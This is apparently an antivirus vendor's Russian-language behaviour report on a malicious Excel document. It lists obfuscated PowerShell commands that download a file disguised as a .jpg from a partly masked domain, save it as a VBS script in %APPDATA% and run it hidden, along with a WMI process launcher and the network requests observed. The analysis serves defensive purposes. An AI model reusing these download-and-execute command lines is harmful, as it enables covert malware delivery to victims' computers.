Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $Computer = '.';$c = [WMICLASS]"""\\$computer\root\cimv2:WIn32_Process""";$f =[WMICLASS]"""\\$computer\root\cimv2:Win32_ProcessStartup""";$ty =$f.CreateInstance();$ty.ShowWindow = 0;$proc = $c....
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' '(&'+'(G'+'C'+'M'+' *W-'+'O*)'+ 'Ne'+'t.'+'Web'+'Cli'+'ent)'+'.Dow'+'nl'+'oad'+'Fil'+'e(''http://co#####asflytour.com/new/28julhotopn2.jpg'',''%APPDATA%''+''\vinteoito.vbs'')'|IEX; start-proces...
- '<SYSTEM32>\wscript.exe' "%APPDATA%\vinteoito.vbs"
Сетевая активность
TCP
Запросы HTTP GET
- http://co#####asflytour.com/new/28julhotopn2.jpg
UDP
- DNS ASK co#####asflytour.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' '(&'+'(G'+'C'+'M'+' *W-'+'O*)'+ 'Ne'+'t.'+'Web'+'Cli'+'ent)'+'.Dow'+'nl'+'oad'+'Fil'+'e(''http://co#####asflytour.com/new/28julhotopn2.jpg'',''%APPDATA%''+''\vinteoito.vbs'')'|IEX; start-proces...' (со скрытым окном)
Запускает на исполнение
- '%ProgramFiles%\microsoft office\office14\excel.exe' -Embedding
- '<SYSTEM32>\cmd.exe' /c start /min powershell $Computer = '.';$c = [WMICLASS]"""\\$computer\root\cimv2:WIn32_Process""";$f =[WMICLASS]"""\\$computer\root\cimv2:Win32_ProcessStartup""";$ty =$f.CreateInstance();$ty.S...
